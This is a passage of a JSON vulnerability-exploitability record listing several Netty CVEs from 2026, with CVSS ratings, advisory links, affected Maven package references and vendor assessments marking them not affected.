          "url": "https://avd.aquasec.com/nvd/cve-2026-59899"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59899"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-q4f6-jm68-57ww"
        },
        {
          "url": "https://netty.io/news/2026/07/09/4-1-136-Final.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59899"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59899"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:25:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59900",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, Netty's HTTP/2-to-HTTP/1.x translation layer (`Http2StreamFrameToHttpObjectCodec` and `InboundHttp2ToHttpAdapter`) fails to deduplicate or validate `Host` headers when an HTTP/2 client supplies both the `:authority` pseudo-header and a literal `host` header in a single HEADERS frame. The translator maps `:authority` to `Host` and separately copies the literal `host` header, producing an `HttpRequest` object containing two `Host` headers with attacker-controlled differing values. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59900"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59900"
        },
        {
          "url": "https://github.com/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-c69g-56f8-xwqj"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59900"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59900"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:01+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#f36d9be0-223a-480d-ac43-4ccda81eafea"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#f05fb034-d141-40cb-b24f-e178578dfdfe"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#9c9a0197-9546-4464-b832-c43608fa1643"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f497f4cd-758e-453a-a598-0684fb4bd0bd"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f6c644f2-1cb7-46db-ac12-0d4298df0276"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#fa9d4f04-e3b4-4e69-a087-ba1f69b1a773"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#ede0b250-e597-45c2-8ba1-eec97af11449"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#bdbc2685-118b-4282-97a3-ed98be0c136f"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f23f079c-11fd-406f-bab1-ee328be73082"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#fab8a7cd-cc02-4201-b2b7-328aa920d10e"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#e6577c8c-2220-42f5-a711-6e4fde63083d"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ccb0e784-5e2d-4081-b505-11742ec045e6"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fa99c0f8-15bc-4197-ab71-3f7e1a5138b8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fea89b6d-6d6d-4359-9491-46720bbafcad"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e8933146-8b13-43c7-80d7-1c358686d246"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f13f00e8-36ba-4779-8da7-32d548d02884"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#a5e6c908-d14e-43d9-9cd3-fce99ad1f613"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http2@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#bfb5183b-50d4-4228-8f19-a49960f6fcb5"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59901",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        835
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the `Bzip2Decoder` handler in Netty's compression codec pipeline is vulnerable to a denial-of-service attack through a malformed bzip2 stream that permanently captures the event-loop thread in an infinite loop. The vulnerability exists in the run-length encoding (RLE) state machine within [`Bzip2BlockDecompressor.read()`]. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec to version 4.1.136.Final; Upgrade io.netty:netty-codec-compression to version 4.2.16.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59901"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59901"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-558v-64gr-wgg4"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59901"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59901"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:29:27+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-compression@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-compression@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#3f46b870-a78f-40f0-9bea-d6ba6f8f3482"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#666ba6d5-b41a-4e5c-a4a1-75fe1edf9e34"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#c9b34fe2-2ab9-41b4-a948-610c48501baa"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#ad563bde-f8bf-4f22-bb66-010e5a172c5d"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#7730b49b-5dd2-4a0f-829b-0c00f69f9968"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#beea4efc-6f9e-4bd7-8428-df537d614924"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#d9456c66-419e-45ec-9ac7-f6180dd2986c"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f84f35d9-a84d-4247-b688-2696507ae005"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f10184f4-ca3a-442f-8897-91a28a7ae619"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#f128c46d-17d4-44be-b051-0e3871ba9873"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#b8a2bbbd-9825-46db-bdb0-c1006289bcaf"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#ce036e1e-6fc8-40f4-a577-c199ba672061"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#fe1a3d7b-4574-4f2a-9aeb-1e9a1c8bc54d"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#c94cfbea-0248-4dce-a092-dde8be9b5c23"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#84c16e77-14a5-411b-9f85-d7be9490d5e0"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fddfbdfd-1dfb-4fac-9e3b-a318428cddae"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#d209285a-e8ee-4e9e-8c72-bf4a294a3a46"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f8e690f8-8911-44c8-86a7-2458c37442eb"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#ff85335d-81c2-405b-b380-c7b0b952ff16"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#bccc7f26-7f45-45e1-9798-278b43adb6b7"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#eee4c1d0-9032-4f1d-ad09-f0c2fe7d367e"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-compression@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#95e93dad-44ca-4188-a6f9-3ca5da39473e"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec@4.1.135.Final"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Netty's Bzip2Decoder is not used in the Confluent Platform codebase."
      }
    },
    {
      "id": "CVE-2026-59903",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N"
        }
      ],
      "cwes": [
        524
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, io.netty.handler.codec.http.cors.CorsHandler setVaryHeader replaces application Vary headers such as Authorization or Cookie with Origin, allowing a caching proxy or CDN to reuse authenticated responses across users and disclose sensitive information. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.17.Final, 4.1.137.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59903"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/pull/17213"
        },
        {
          "url": "https://github.com/netty/netty/pull/17217"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.137.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.17.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-8c42-7qj2-3j46"
        }
      ],
      "published": "2026-08-17T18:17:36+00:00",
      "updated": "2026-08-17T19:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59921",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
